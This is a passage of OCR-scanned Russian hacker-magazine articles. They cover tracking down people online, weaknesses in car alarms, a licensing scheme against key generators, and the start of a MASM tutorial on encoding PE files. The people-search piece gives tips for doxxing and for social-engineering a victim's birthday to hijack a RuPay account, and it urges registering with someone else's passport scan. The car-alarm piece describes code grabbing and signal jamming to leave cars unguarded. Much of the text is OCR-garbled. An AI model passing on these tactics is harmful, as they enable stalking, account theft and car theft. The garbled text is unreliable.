Пендосии, совершивших какие-либо правонарушения. 
Заполнив формочки имени, фамилии и штата (Рогпап ѴѴеІІз, 
ѴѴізсопзіп), я надавил на клаве «Епіег». Моемуудивлению 
не было предела — нашелся только один человекстакими 
данными, проживающий в городе Опаіавка :). Огорчало лишь 
одно: вся дополнительная информация предоставлялась 
ресурсом не бесплатно. Хотя к оплате принимались кредитки 
и... Ой, о чем это я =). В общем, вся собранная мной инфа 
была передана клиенту, который остался доволен качеством 
выполненной работы. 

Какты понял из вышеописанной истории, есть вполне ре- 
альный шанс собрать необходимые данные. Единственное, 
на что я хотел бы еще обратить внимание, — это характерные 
особенности поиска в рунете :). Я не буду останавливаться 
натакихбазах данных, какбазы ГИБДД, паспортно-визо- 
вой службы ит.д. А вот о некоторых любопытных интернет- 
сервисах стоит поговорить поподробнее =). Сейчас в Сети 
достаточно распространены услуги детализации звонков и 
5ГП5. Естественно, бесплатно никто ничего делать не станет. 
Но зачастую цены вполне разумные (около $80 за полную 
детализацию указанного номера). Занимаются предоставле- 
нием подобной инфы преимущественно различные частные 
сыскные агентства. Линков давать не буду, ты и сам без труда 
найдешь их через Гугл. Также в сети без проблем можно 
оперативно пробить данные по машине (только не потой, 
которая стиральная =)). Примером тому является ресурс 
ѵѵѵ\лл/.сЬеск.0550.ги . Здесьтебе и пробив авто на угон, и поиск 
по госномеру, и прочее. Однако будь осторожен — в рунете 
полно кидал, которые создаютлиповые сервисы самых раз- 
нообразныхтематик. Но, как говорится, сервис сервису рознь. 
Иногда возникает необходимость ручного сбора данных. 
Воттутне забывай про мой пример с амером. Во-первых, 
богатым источником информации является мыло объекта. В 
одном из прошлых номеров я выкладывал брѵтердля таіі.ги . 
который юзаетбрут через веб-аутентификацию (читай под- 
шивку «Хакера»). Так что если есть возможность получить 
доступ к мылу, не пренебрегай ей. Во-вторых, большинство 
блогов, интернет-магазинов, чатов, форумов и прочих 
сетевых заведений ведутлоги. Поимев базу с ресурса, на 
котором регулярно обитаеттвой объект, ты оченьупростишь 
себе задачу =). 

Кстати, насчет мыла и логов. Приведу показательный 
пример. Наверняка ты знаком стакой платежной системой, 
как РиРау. Это одна из крупнейших платежек в рунете. Так вот 
для доступа к аккаунту необходимо указать мыло и пароль. А 
вопросом на восстановление пасса является дата рождения 



холдера акка. Как показывает практика, многие люди вводят 
свою действительную дату рождения, что не может не 
радовать загадочное хакерское сердце =). Что мешаеттебе 
прикинуться симпатичной одинокой девушкой и постучать 
холодной ночью в асю жертве с целью разузнать, скоро ли 
будет его/ее ДР? :) Поимев аккаунт в РиРау, ты не сможешь 
совершать транзакции, поскольку для всехденежных 
операций нужен еще один пароль, сменить и восстановить 
который просто так нельзя. Но вот просматривать историю 
операций будет вполне реально. Аучитывая, что вывод 
средств осуществляется только на банковские счета рези- 
дентов,™ получишьоченьлюбопытную банковскую инфу о 
своем объекте :). 

Вообще говоря, все зависит от конкретных обстоятельств и 
целей поисков. Если тебе нужен телефон девушки с форума, 
это одно дело, а если координаты месторасположения ре- 
жимного объекта Министерства обороны, это совсем другое 
дело =). Но и первое, и второе вполне реализуемо, было бы 
время, желание и трезвая голова :). 

Кто не спрятался, я не виноват 

Все мы в детстве играли в прятки. Вот и сейчас я предла- 
гаютебе немного поиграть в эту забавную игру =). Только 
прятаться на этот раз мы будем в сети. Я не буду сейчас 
говоритьоѵрп, соксах, прокси и прочих мерах безопаснос- 
ти. Обэтом писалось на страницах нашего журнала не раз. 
Попробуем зайти с другой стороны. Как говорят сотрудники 
наших доблестных служб (каких, полагаю, пояснять не надо :)), 
гораздо проще работать с человеком, нежели стехникой. Я 
никогда не мог (да и не пытался) понять людей, которые без 
лишней надобности оставляютсвои личные данные в сети. 

И неважно, ФИО это или номер/серия паспорта; пойми, это 
ТВОИ ДАННЫЕ и знать ихтретьим лицам вовсе не обяза- 
тельно. Аналогичная беспечность многими проявляется и в 
реале. Отсюда вытекает несколько простых, но очень важных 
правил: 

1 . Никогда не оставляй в сети свои реальные личные 
данные. 

2 . Никогда не оставляй в сети свои реальные контакты 
(номера телефонов, адреса). 

3. Никогда не передавай ксерокопии своих личных докумен- 
тов без большой необходимости. 

4 . Не болтай в реале о своих похождениях по базам поломан- 
ных серверов. 

Относительно первых двух пунктов, думаю, вопросов 
возникнуть не должно. Свои контакты и реальные данные 
еле дует о ста в л ять толь ко в крайнем случае, когда это дейс- 
твительно необходимо. Аналогично и с ксерокопиями твоих 
доков. Если какой-либо сервистребуетсканы паспорта.то 
смело регистрируйся на левые данные с чужим/фейковым 
сканом — и все дела :). А вот про реал отдельный разговор. 
Сколько уже было песен об излишней болтливости, а все 
без толку. Сегодня ты за кружкой пива обмолвился о своем 
взломе базы, а завтра сутра пораньшетебя принимаютв 
собственной квартире :). Шутки шутками, а реал — вещь 
опасная. Так что будь аккуратнее, причем везде и во всем. 
Безопасности, какты понимаешь, много не бывает=). ~и~ 
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>Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомления! 
Ни автор, ни редакция 
за твои действия 
ответственности не 
несут! 




> Найти человека в 
сети вполне реально. 
Главное — знать, где 
и как искать =). 

> Помни, что боль- 
шинство интернет- 
шопов, веб-сер- 
висов, платежек и 
прочих ресурсов 
ведутлоги, которые 
не раз помогуттебе 
при сборе нужной 
инфы. 
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ЛЕОНИД «ВОЮ» СТРОИКОВ 

/ КОШМАН.. РУ / 



Угнать 
за 60 секунп 




Анализ защищенности автосигнализаций 

В наше суровое время, когда воруют все, что можно украсть, сигнализациями никого не 
удивишь. Банкоматы, квартиры, офисы — все это, как правило, охраняется не святым ду- 
хом. Аналогичным образом дело обстоит и с автотранспортом. Согласись, что тебе будет 
не очень приятно увидеть, вернее, не увидеть свою новенькую «бэху» там, где ты ее оставил. 
Как ни крути, но на 80% машин стоят сигналки. И не столь важно какие (в этом мы разбе- 
ремся позднее), важен сам факт их наличия. Поэтому сегодняшняя статья будет посвяще- 
на именно автосигнализациям, а точнее, анализу их защищенности :). Только пойми 
меня правильно, мы не будем учиться угонять машины, а просто поищем слабые места 
в сигналках :). 



Как это работает 

Прежде всего нам нужно разобраться с внутренним устройством сигна- 
лок. В противном случае все наши действия будут подпадать под хорошо 
известную пословицу: «Иди туда — не знаю куда, ломай то — не знаю 
что»=]. Поэтому обо всем по порядку. Для начала рассмотрим основные 
компоненты большинства автосигнализаций. Это: 

• центральный блок; 

• реле блокировки; 

• реле запуска; 

• датчик удара; 

• светодиод; 

• сирена; 

• датчик изменения объема; 

• коммуникационные провода; 

• брелок-коммуникатор. 

Центральный блок обычно располагается за или под приборной 
панелью авто. Название этого агрегата говорит само за себя — к нему 
коннектятся все компоненты сигналки. Реле блокировки и реле за- 
пуска мы пока трогать не будем, о них разговор пойдет позже. Отмечу 
лишь, что в стандартной комплектации их наличие может варьиро- 
ваться. 

Следующий важный компонент — датчикудара ака шок-сенсор. Этот 
девайс реагирует на удары/пинки по автомобилю :). Устанавливается он 
обычно на прочной поверхности в салоне машины и имеетхарактерный 
регулятор чувствительности. 



Следующий компонент, который является обязательным атрибутом 
любой сигнализации, — сирена. Размещаютее в моторном отсеке, что 
затрудняет доступ извне со стороны днища, а во-вторых, некоторые 
отдельно взятые экземпляры могут иметь автономный аккумулятор. Оба 
фактора существенно осложняютжизньугонщикам, но выход все равно 
найти можно =). 

Последняя значимая деталь сигнализации — брелок-коммуникатор. 
Нужен он, собственно, для управления автосигналкой по радиоканалу на 
частоте 433,92 МГц. В последнее время у брелоков появилось множество 
программируемых функций, которые напрямую зависят от модели сигна- 
лизации. Перечислять их нет никакого смысла — нас больше интересует 
код сигнала, передающийся устройством. Забегая вперед, скажу, что 
существуют возможности его перехвата =). 

Теперь рассмотрим систему блокировки двигателя. Состоитона из блока 
управления, приемопередающей антенны, транспондеров и реледис- 
танционной блокировки двигателя. 

Зачем нам это нужно знать? Дело в том, что иногда на авто устанавливают 
нетолько сигнализацию, но и систему блокировки двигателя. Поэтому 
короткое подетальное рассмотрение системы не повредит=). 
Блокуправления располагается в салоне автомобиля. Антенны уста- 
навливаются двух типов: рамочная и ферритовая. Реле блокировки 
представляет собой стандартное реле. Принцип действия сводится к 
размыканию цепи блокировки. При включении блокировки цепь размы- 
кается сразу. Одна из особенностей некоторых экземпляров — блокиров- 
ка двигателя после начала движения машины :). 
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> Код-граббер Р1и5 Рго^ 



Итак, главное, что ты должен был усвоить из первой части 
статьи, — это основные компоненты автосигнализаций и 
принцип их работы. Надеюсь, с этим ты более-менее разо- 
брался, если нет— перечитывай сначала :). 

Поехали 

Ну вот мы и подошли ктому, к чему, собственно, и должны 
были подойти — канализу защищенности сигнализаций =). 
Халявщиков, которые рассчитывают после прочтения этой 
части статьи угнать стоящую подокном машину соседа, я 
попрошу выйти из аудитории =). Остальных не будутомить, 
приступим. Начнем с возможных методов «атак» на нашу 
жертву ака автосигнализацию стандартного типа (описан- 
ного выше]. Определимся, на что именно мы собираемся 
осуществлять свои «нападки». Варианта всего два: 

1) радиоканал (сигнал ка-брелок); 

2) механическое вмешательство. 

Первый метод представляется мне достаточно интересным. 
Как я уже говорил, брелоки работают на частоте 
433,92 МГц, однако каждая сигналка имеетсвой собственный 
код, благодаря которому и происходитопознавание брелока. 
Так какже подстроиться под чужую сигнализацию? Для этого 
нужно каким-то образом узнать код конкретной сигналки. 

Без дополнительных девайсов сделать это нереально, поэ- 
тому придется воспользоваться либо код-граббером, либо 
сканером. Сканер представляет собой устройство, которое 
последовательно воспроизводит коды в формате взламыва- 
емой сигнализации. Грубо говоря, сканер является брутером. 
Согласись, что достаточно удобно воспользоваться методом 
брутфорс-атаки и подобрать код сигналки, тем более что этот 
девайс вполне реально собрать в домашнихусловиях. Од- 
нако многие современные автосигнализации имеютсистему 
антисканирования, которая устанавливаеттайм-аут между 
приемами неверного значения кода с последующей блоки- 
ровкой. Введенная блокировка снимается лишь многократной 
передачей правильного кода. Следовательно, сканер в таком 
случае бесполезен. Тут ему на помощь приходит код-грабер =]. 
Дело втом, что антискан-системы не защищены от перехвата 
кодов из эфира. Этот фа кт оста вляет возможность отснифать тре- 
буемый код. Необходимо лишь выждать момент, в который вла- 
делец машины ставит свой любимый агрегат на охра ну (включает 
сигнализацию). Код-грабер работает по принципу радиоснифера 
на той же частоте, что и брелоки сигналок. Мои знакомые с порта- 
ла дЬгеакш собирали подобныедевайсы своими руками, такчто 
при желании в Сети ты найдешь схемы таких устройств :). 

И все бы хорошо, если бы не системы с динамическим кодом. 
Подобные системы не используют один и тот же код 



постоянно. С каждым включением сигнализации код ме- 
няется динамически, что делает бессмысленным приме- 
нение код-грабберов. В этом случае невозможно угадать, 
какая кодовая комбинация послужит в будущем для снятия 
автомобиля с охраны, а повторение отснифанного ранее кода 
не принесетжелаемого результата, поскольку старый код 
становится недействительным. 

Наиболее популярной системой такого плана является 
КееІ_од, которая использует кодирующие/декодирующие 
ключи. Кодирующий ключ — 64-битовая комбинация, 
образуемая генерирующей функцией из серийного номера 
и 64-битового ключа изготовителя. Этот ключ никогда не 
светится в эфире и записывается в память декодирующего 
устройства. Для того чтобы сигнализация могла опознать 
свой брелок, в кодовом сигнале брелока и памяти декодера 
сигнализации содержатся одинаковые коды-идентификато- 
ры, которые запоминаются сигнализацией при программи- 
ровании брелоков. Кстати, сам код- идентификатор каждого 
брелока уникален (обычно вшивается при изготовлении). 
Крометого, все использованные ранее коды отсеиваются 
как недействительные и более не используются, что опять же 
мешаетприменению код-грабберов. 

Вся фишка втом, что можно создать видимость несрабаты- 
вания сигналки путем подавления первого передающегося 
сигнала. То есть владельцу потребуется еще раз нажать на 
кнопочку брелока. Вот второй код нам и поможет, он вполне 
работоспособен, но еще не был передан, вто время как 
сигналка, на самом деле, была активирована еще при первой 
посылке сигнала. Справедливости ради отмечу, что реали- 
зация этого метода на практике достаточно сложна. Но есть 
и более простой метод. Тут уже не обойтись без социальной 
инженерии. Иногда угонщики подавляютсигнал генерато- 
ром «белого шума». У владельца создается впечатление, что 
в брелоке села батарейка, после чего машина в 90% случаев 
остается одна и без охраны =). В общем, какты видишь, спо- 
собы есть, была бы смекалка и фантазия :). 

Приехали 

Автосигнализация — вещь интересная и достаточно 
сложная. Описать все еетонкости и нюансы при небольшом 
объеме статьи попросту невозможно. Думаю, эта тема не 
исчерпаетсебя, пока существует автотранспорт. Напоследок 
замечу, что не стоит вставать на скользкую дорожку крими- 
нала и применять полученные знания в противозаконных 
целях. В противном случае тебе придется более подробно 
знакомиться уже не с моими статьями, а со статьями Уголов- 
ного кодекса .цс 
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> На дискеты найдешь 
архив со схемами код- 
граббера Р1и5 Ргоб 




>Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомления! 
Ни автор, ни редакция 
за твои действия 
ответственности не 
несут! 




> Сканер является 
брутером кодов авто- 
сигнализаций, с его 
помощью подбирается 
конкретный код отде- 
льно взятой сигналки. 

>Помни, что ни анти- 
скан-системы, 
ни динамический код 
н е да ют сто п ро це нтной 
гарантии защиты от 
взлома сигнализации :). 
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Прощай, кейген! 

Защищаем софт от генераторов ключей 

Привет всем кодерам и хакерам! Статья по большей части адресуется первым, но и вторым 
неплохо было бы послушать. Итак, представь: сбацал ты супермегапрограммку, которая 
контролирует процесс приготовления куриной яичницы с приправой. Запатентовал. 
Решил продавать. На следующий день заходишь в инет, а там полно ссылок: «Кряк к су- 
пермегапрограммке Яйца », «Кейген к супермегапрограммке Яйца”» — и еще тысячи две 
способов ее лома описано. И от этого всего тебе придется защищаться. Я же тебе расскажу, 
как по-человечески (то есть на веки вечные) избавиться от такого гадкого способа взлома 
твоих программ, как написание кейгена. 

Лирическое наступление 

Вопросом защиты ПО я интересуюсь давно. Я проанализировал 
много инфы, и, по-моему, предложенный ниже способ новый. По 
крайней мере.онемяинформации не нашел. Поэтому, подав заявку 
на соответствующий патент, я не слишком удивился, когда получил 
положительное решение. Итак, описываемый ниже способ защиты 
запатентован (в комплексе еще с несколькими полезными реше- 
ниями, о которых я тебе расскажу в следующий раз, потом, если ты 
захочешь). Впрочем, патенты в наше время выдают на все что угодно 
(задай в поисковике фразу: «Патент на вечный двигатель» — во 



посмеешься!), поэтому приветствуется живая дискуссия по поводу 
новизны, полезности и действенности предлагаемого способа защи- 
ты от кейгенов. 

Как ломают программы 

Способы взлома программных защитты и без меня знаешь (подчер- 
киваю, что мы будем говорить о программных защитах, так как всякие 
хаспы простому смертному кодеру с его программой «Яйца» не очень 
доступны). А если незнаешь.то вдвух словах: патчат двоичный кодили 
пишут кейген. Возможны и другие методы взлома, я тебе назвал два ос- 
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> Предлагаемая схема защиты оттиражирования без внутреннего серийника 



новных, знакомых всем нам на практике. Чувствуешь, что эти два метода 
принципиально разные? Каждый из них по отдельности можетпривести 
к необходимому результату — несанкционированному использованию 
твоих «Яиц». 

Значит, и защита должна состоять как минимум из двух более-менее не- 
зависимых компонентов (кто в курсах, это модель элементарной защиты с 
двумя звеньями). 

Первый компонент отвечаетза целостность программы (ну илитолько 
системы защиты — можно ведь контролировать целостность не всей про- 
граммы, а только защитного механизма). Мне захотелось этот компонент 
назватьфизической защитой. Реализовываться она может по-разному: 
например, можно осуществлять превентивный контроль, запрещая 
любую запись в ехе-файл. Можно не разрешать использование модифи- 
цированных файлов. Тоесть изменять изменяй, но ни в коем случае не 
задействуй. Последний вариант мне показался более приемлемым, и я 
его и забабахал в свой патент как часть способа защиты ПО от несанкци- 
онированного использования. Но что-то мы отвлеклись, сегодняшняя 
наша цель — борьба с кейгенами! 

Итак, второе звено — логическая защита. Это защита оттиражирования 
одной легально купленной копии на много разных машин. Какее можно 
сделать? Можно попытаться спрашиватьу пользователя его персо- 
нальные данные, отправлять их на сервер поставщика ПО, на их основе 
высчитывать внешний серийный номер и возвращатьего обратно. Наша 
программа на основании вводимой фамилии пользователя вычисляет 
свой внутренний серийный номер и сравниваетего с вводимым пользо- 
вателем внешним номером (который надо получать от поставщика). Таким 
образом, вроде все отлично: и учет пользователей ведется, и программы 
не тиражируются. Однако же такой подходне выдерживает никакой крити- 
ки: пираты могут купить один экземпляр программы и дальше тиражиро- 
вать его с указанием фиктивных имени и фамилии, которые нужно вводить 
при регистрации. И заметь, при этом даже не надо ничего ломать! 



ЧТО ТАКОЕ ПРЕВЕНТИВНАЯ ФИЗИЧЕСКАЯ ЗАЩИТА? 



Ясен перец, что готовый откомпиленный ехе-файл никогда не должен 
изменяться. Атот, кто хочетего изменить, — подлец несчастный или гряз- 
ный вирус. А ну-ка придумай ситуацию, в которой для каких-то мирных 
целей нужно изменить экзешник! Что, не выходит? Хе-хе, нетута ких си- 
туаций. Значит, надо подобное безобразие контролировать и упреждать. 
Желательно это делать на уровне ОС, что нам опять же будет недоступно. 
Хотя тут уже кто какзахочет: пиши драйверок, работающий с высокими 
привилегиями, запрещающий вносить изменения в ехе-файлы, — и 
готов примитивный, но действенный файловый антивирус, который 



Нотакой метод нелегального распространения, конечно, почти никогда 
не применяется — несолидно это в то время, когда в мире есть тысячи 
хакеров, жаждущих славы и признания. Те садятся за свои суперкомпью- 
теры и за короткое время выясняют, какже на основании слова «Пуп- 
кин» вычисляется страшный серийный номер 111. Потом пишут кейген, 
который работаетпо этому алгоритму, и вотюзерууже не надо вводить 
какие-то там фиктивные данные, вводи себе свои родненькие, а кейген, 
вместо поставщика ПО, сделаетвнешний серийник. 

Как бороться: способ номер один 

Что ж, давай подумаем, как можно избавиться от простейшего метода 
распространения одной легально купленной копии твоих «Яиц». Такое 
распространение возможно, потому что мы высчитываем серийник на 
основании данных пользователя, а он, понятное дело, можетуказать про- 
извольные данные, то есть нас обмануть. Значит, логично будет запраши- 
вать персональные данные компьютера. Их-то пользователь подделать 
не сможет! 

Итак, мы будем производить привязку к программно-аппаратной 
среде компьютера, на котором будет использоваться наша програм- 
ма. Ну что это могут быть за сведения? Например, серийные номера 
всяких компонентов ПК (процессора, винчестера и пр.), особенности 
файловой системы, реестра ит.д. Чем больше мы возьмем разных 
характеристик компьютера, тем меньше вероятность их имитации. Но 
при этом возрастает частота обращений к нам конкретного пользова- 
теля за сменой активационного кода. Подумай, ведь если он заменит 
процессор, то нам придется заново выдавать ему серийник! А если 
делать привязку к программной части, то это вообще жесть. Количес- 
тво контролируемых характеристик и их тип надо выбирать с опорой 
на экономические расчеты (то есть ценность одной копии твоего 
ПО). В защите информации почти всегда все решает не техника, а 
экономика :-). 

тоже можно продать! Правда, как известно, на любой драйверок всегда 
найдется еще более драйверистый драйверок :). 

В образовательных целяхзапусти свой любимый антивирь и попробуй 
изменить любой мирно лежащий экзешник, хотя бы открыв его блокно- 
том. Все пройдет гладко и спокойно. Кто еще не верит, пускай напишет 
программку, которая изменяетлюбой экзешник программно, и стартанет 
ее. Сработает. Короче не ловят популярные антивирусяги такие дейс- 
твия. Азря. 

Итак, превентивный контроль — это запретвнесения изменений в испол- 
няемые файлы (потому что они и так никогда не должны 
изменяться). 
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Итак, модифицированная схема защиты оттиражирования ПО выглядиточень 
просто (смотри схему]. Теперьтупо распространять одну копию с фиктивными 
персональными данными неудастся. Мы осуществили очень популярную 
привязку каппаратной части ПК, которую ятебе предлагаю делать еще и 
программно-аппаратной. Эффективный метод. Действительно, небудетже 
товарищ взломщик распространять однулегально купленную копию вместе с 
процессором и всеми потрохами, на которые была куплена эта копия? :-й Но 
что-то все равно не радостно. От простого тиражирования-то мы защитились. 
Но хакеры... они жтак и будут продолжать писать свои гадкие генераторы, из- 
за которых продажи «Яиц» пода ют ниже плинтуса. Что же делать? 

Принцип написания генератора 

Давай подумаем, какхакер пишет генератор. На основании какихсве- 
дений он это делает? Ему ведь надо знать, как поставщик высчитывает 
внешний серийный номер? 

Смотрим внимательно на схемы. С чем сравнивается внешний серийник? 
Правильно, с внутренним серийником. А по какому алгоритму высчитывается 
внутренний серийник? По сугубо секретному алгоритму, который находится в 
самой распространяемой программе. Стой кость та кой защиты базируется на 
секретности алгоритма, что, в общем-то, уже не очень хорошо. Напоминаю, 
что стремиться нужно к такому способу защиты, при котором ее стойкость ос- 
новывается на секретности ключа — почитай правила Кирхгофа для шифров. 
Итак, полагать, что от взломщика можно скрыть какие-то сведения, нахо- 
дящиеся в копии ПО на его стороне (то есть на его компе], — наивно и даже 
глупо. Скрыть-то можно, зашифровав и выбросив ключ, но в таком случае 
эти данные останутся лежать мертвым грузом в программе. Если же надо в 
программе какие-то сведения использовать, то можно предполагать с ве- 
роятностью 100%, что эти сведения доступны не только нашей программе, 
но и хакеру. И это не зависит оттого, какого характера эти сведения: испол- 
нимый код или статические данные (например, ключ]. Следовательно, раз 
алгоритм создания внутреннего серийника должен использоваться нашей 
программой, то получить к нему до ступ сможет и мазахакер. Насколько 
трудно это будет — это уже второй вопрос, ноты не обольщайся. Даже если 
ты 1 00 раз зашифруешь алгоритм создания внутреннего серийника, хакер 
только порадуется :-й. Ему, понимаешьли, в кайф вскрыть очередную 
защиту, просто-таки разложить по полочкам и со спокойной совестью сдать 
написанный по изученному алгоритму генератор на какой-нибудь крякерс- 
кий форум. Дальнейшее развитие событий известно: хакер идет пить пиво, 
а крякеры получаюттонны зелени с продаж нелегального ПО. 

Как бороться: способ номер два 

Ну, в общем-то, кто там что получает — это не наше стобой дело. Наше 
дело — пресечь все мерзкие действия по написанию генератора. Для 
этого надо как-то избавиться от алгоритма расчета внутренних серийных 



номеров. После некоторых размышлений я решил применить криптогра- 
фический алгоритм доказательства при нулевом знании. В этом случае 
копия ПО выступает в роли проверяющего, а поставщик ПО — в роли до- 
казывающего. То есть поставщик (через промежуточного агента — поль- 
зователя ПО, что в принципе несущественно) должен доказать копии ПО, 
что она имеет право запускаться на данном ПК. Теперь конкретнее. Копия 
ПО собирает идентификационные данные среды, в которой она будет 
работать, и отправляет их на сервер поставщика лицензий. Поставщике 
использованием своего секретного ключа генерирует цифровую подпись 
полученных идентификационных данных и отправляет назад. Копия ПО 
с помощью открытого ключа поставщика проверяет соответствие его 
цифровой подписи идентификационным данным своей программно-ап- 
паратной среды. 

Если проверка цифровой подписи прошла успешно, программа начинает 
свою нормальную работу, в противном случае завершается. На практике 
такие проверки надо осуществлять, естественно, не один раз, а регуляр- 
но, допустим, при каждом запуске ПО. 

В чем же преимущество предлагаемого подхода? А в том, что теперь нет 
секретного алгоритма, заложенного в само ПО, доступного хакеру. Копия 
ПО всего лишь должна проверить соответствие цифровой подписи иден- 
тификационным данным компьютера и пользователя. А это делается, как 
и в любой системе проверки подлинности, с помощью открытых ключей 
поставщика по известному алгоритму. На основании открытого ключа 
поставщика создать цифровую подпись нельзя, если, конечно, применя- 
ется стойкий алгоритм цифровой подписи. Чужую подпись взять нельзя, 
таккакона зависит отхарактеристикданного ПК. Вот засада, правда? :) 

Немного о преимуществах формализации 

Ты мне можешь сказать, что такую систему проверки все равно можно 
взломать, изменив двоичный код системы защиты (банальная смена 
условной команды ассемблера на логически противоположную). Но ведь 
это принципиально иной метод взлома! 

Тут ты и попался! Суть предлагаемого мной общего формализованного 
метода создания программных защит (любого назначения] заключается 
в разбиении системы защиты на две части, и первая из них — физическая 
защита от модификаций кода (посмотри-ка в раздел «Как ломают про- 
граммы»). Это ее функция — предохранять от изменений двоичный код 
ПО. Какты эту часть реализуешь — дело твое, но она должна присутство- 
вать в любой программной защите. 

Защита же оттиражирования одной легально купленной копии на много 
разных ПК относится ко второму классу — логическим защитам. Они 
должны выполнять специфические функции, ради которых первоначаль- 
но и возводиласьсама система защиты. Вот, например, если мы создаем 
защиту от нелегального распространения ПО, надо с помощью этой 
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логической защиты запретить установку (тиражирование) одной легально 
купленной копии на много разных ПК. Аза целостность этой защиты, за 
то, что она будет работать правильно и адекватно, будет отвечать звено 
физической защиты. 

Физическая защита без логической не имеетсмысла.таккакона следит 
за целостностью самой системы защиты, а не выполняет какие-либо 
смысловые действия для области применения системы защиты. Логи- 
ческая защита без физической не имеетсмысла, так какее элементарно 
ломануть с помощью изменений двоичного кода. 

Таким образом, предложена формализованная методика построения 
программных защит. Два звена: логическое и физическое. Реализо- 
вываться они могут по-разному. Чтобы тебе не показалось, что такая 
методика построения программных защит притянута за уши только к 
системам защиты от пиратства, приведу еще один пример. Вот разработал 
я систему программной биометрической идентификации, которая следит 
за пользователем и контролирует, тот л и это человек работает, или его 
подменили еще в роддоме (главное, чтоб уже после снятия эталонных 
данных :-0). Эта система тоже построена по подобной методике. Логичес- 
кая защита снимает данные и сравнивает их с эталоном, то есть выпол- 
няетте действия, ради которых выполнялось построение всей системы 
защиты. Но это ж еще не все! Не надо забывать, что нехороший человек 
может модифицировать программную систему идентификации, изменив в 
ней самый последний перед выдачей вердикта условный оператор. При 
таком изменении всего лишьодной команды ассемблера вся многоме- 
сячная работа идет коту под хвост. Та к вот я прикрутил туда еще звено 
физической защиты, итеперьфигтам что-то изменишьтак просто, легче 
нанятьсебе двойника :-). 

Что ж, подход простой. Два звена — защита от двух угроз, соответственно. 
Хорошая у меня классификация, большая :-). Рекомендую ознакомиться 
и сдругими классификациями угроз программному обеспечению, пред- 
лагаемыми, например, МісгозоЛ. Для этого ищи в инете ОРЕАО и/или 
5ТРЮЕ. Посмотри, сколько там угроз рассматривается. А способствует ли 
это как-то созданию защит (в чем и заключается цель любой классифика- 
ции угроз) — решай сам. 

Хочутолько еще отметить, что многие угрозы на самом деле угрозами не 
очень и являются. По моему мнению. Вот, например, угроза исследова- 
ния программного обеспечения с помощью дизассемблера или отладчи- 
ка. Ведь само по себе исследование не можетповлечь негативные пос- 
ледствия для твоего ПО. Кним можетпривести физическая модификация 
или написание генератора ключей, которые следуютза исследованием 
кода. Таким образом, трудно сказать, является ли исследование кода с 
помощью дизассемблера угрозой его безопасности. Мне вот кажется, 
что это не прямая угроза, а лишь предпосылка для реализации прямой 



угрозы — модификации или создания генератора, от которых мы и должны 
защищаться. Но я бы сказал, что это уже из области терминологии. В об- 
щем, именно на основе правильной классификации угроз строится любая 
система защиты, втом числе и программного обеспечения отнесанкцио- 
нированного использования. Мне хватило двух угроз, аты разрабатывай 
свои собственные классификации. И внедряйте, Шура, внедряйте. 

Короче, Склифосовский! 

Напомню, что основной целью статьи было рассмотрение способов 
борьбы со взломом путем написания генератора ключей. Надеюсь, мы 
успешно справилисьсэтой задачей. Все замечания, критикуй вопросы 
шли мне по почте. С радостью отвечу. 

Кроме разработки всякихтам анти генераторов и схем защиты, статья 
призвана также немного взбудоражить общественность, вызвать жаркие 
споры, шевеление серого вещества. Приветствуются любые мнения, даже 
критика Меня. Особенно — ссылки на похожие методики защиты. Скажу 
только, что перед подачей своего патента я долго рылся в русской 
( уууууу.брз.ги ). украинской ( ѵѵѵѵуѵ.икграІепЕога ) и европейской 
( уууууу.езрасепеЕсот ) базах патентов и ничего похожего на мою продвину- 
тую схему не нашел. Поэтому надеюсь, что моя статья принесет кому-ни- 
будь реальную пользу.цс 



> Граждане! Храните диски в сберегательной кассе! 
Если, конечно, они у вас есть... 
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Программная 
оборона 

Защита РЕ-файлов голыми руками 

Десять лет назад, когда инструменты для дизассемблирования еще не были так легки 
в эксплуатации и распространены, реверс-инжиниринг не был массовым явлением. 
Сейчас же любой среднестатистический юзер, воспользовавшись отладчиком, может 
распотрошить внутренности твоей программы и узнать, как работают созданные тобой 
защитные механизмы. Этого нельзя допустить. Значит, нужно учиться создавать методы, 
затрудняющие анализ. 



егодня мы поговорим отом, как вручную закодировать файл, 
имея под рукой только отладчики шестнадцатеричный 
редактор. Навыки, которыеты получишь в ходе прочтения 
этого материала, помогуттебе понять принцип работы 
протекторов и пакеров. Одновременно™ научишься вручную править 
двоичный код так, чтобы он оставался работоспособным, не имея под 
рукой толстых томов, посвященных программированию на ассемблере. 
Для нашей работы потребуется известная версия компилятора МА5М 
— МА5М32. Мы напишем простейший код, результатом работы которого 
будет выдача МеззадеВох’а с надписью «Неііо, ѴѴогІсІ!». Исследовав 
скомпилированный файл под отладчиком (а он может быть любым, я 
использовал ОІІуйВб], мы посмотрим, как можно создать простейший 
раскодировщик, используя прямые вставки двоичного кода. 

Наша программа 

Итак, приступим к работе. Вот код нашей программы: 

.386 

.тобеі ііаб , зббсаіі ; модель памяти — ііаб 
орбіоп сазешар:попе 



; подключение необходимых библиотек: 
іпсіибе \шазш32\іпс1ибе\ѵ7Іпсіоѵ73 . іпс ; 
іпсіибе ХтазтЗ 2 \ іпсіибе \ кегпе132 . іпс ; 
іпсіибеііб \шазш32 \1іЬ\кегпе132 . ІіЬ ; 
іпсіисіе \шазш32\іпс1исіе\изег32 . іпс ; 
іпсІибеІіЪ \шазш32 \1іЬ\изег32 . ІіЬ ; 

; секция данных 
. баба 

а1егб_иррег 6Ъ "Зішріу ргодгаш" ,0 
а1егб_бехб 6Ъ "Неііо, Мог1б!",0 
; секция кода 
. собе 
збагб : 

іпѵоке МеззадеВох, ШЬЬ, аббг а1егб_бехб, аббг 
а1егб_иррег, МВ_ОК 

іпѵоке ЕхібРгосезз , Ж)ЪЬ 
епб збагб 

Сохрани текст в файле с:\та5т32\Ьіп\ех.а5гп (разумеется, если путь к 
компилятору другой, то вместо с:\та5гп32 будетчто-то иное) и создай 
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> Сдвиг в ѴѴіпНех на 2 байта вправо 




> Модифицированные биты и команда перехода 



объектный файл командой тІ/с/со^/Ср ех.азт. Он будет в формате 
СОРР (ключ ’/с’). После этого доверши компиляцию командой «Ііпк 
/ЗІІВБУЗТЕМіѴѴІМООѴѴВ/иВРАТРІісЛтазтЗгМіЬ/ЗЕСТІОМіЛехі, РѴѴЕ 
ех.оЬі». Ключ /ВЕСЛОМ позволитустановить атрибутзаписи на секцию 
кода, которая именуется Іехі (смешная деталь: я уже скомпилировал 
файл и открыл его в ОІІуЭЬд для отладки, после этого решил проверить 
еще раз правильность параметров компиляции и долго не мог понять, 
